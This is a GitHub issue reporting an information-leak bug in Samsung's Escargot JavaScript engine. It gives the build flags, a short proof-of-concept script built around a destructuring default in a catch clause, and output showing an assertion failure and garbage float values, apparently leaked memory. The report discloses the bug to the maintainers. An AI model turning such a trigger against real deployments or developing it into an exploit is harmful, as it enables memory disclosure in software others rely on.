search

Samsung / escargot

Escargot is a lightweight JavaScript engine designed specifically for resource-constrained environments.
GNU Lesser General Public License v2.1
261 stars 43 forks source link

Infoleak #1375

Open 7331akasokoan opened 2 weeks ago

7331akasokoan commented 2 weeks ago

commit: d398f1ece3bae25c00465aea7f00b548d1131241

build setting: 

cmake -DCMAKE_CXX_FLAGS=-fsanitize=address -DESCARGOT_MODE=debug -DESCARGOT_OUTPUT=shell -GNinja

poc.js:

var v0 = false;
try {
try { throw {}; } catch ({a = (print(a), b), b}) { }
} catch (e) {
v0 = true;
}

Bash Result: 

/escargot ./poc.js
escargot: /home/fuzzer/escargot/src/runtime/Object.h:648: bool Escargot::ObjectGetResult::isDataProperty() const: Assertion `hasValue()' failed.
Aborted
/escargot ./poc.js
/escargot ./poc.js
83456213.01425552
/escargot ./poc.js
-1.7740938470966771e-181
/escargot ./poc.js
/escargot ./poc.js
-60.507442331163475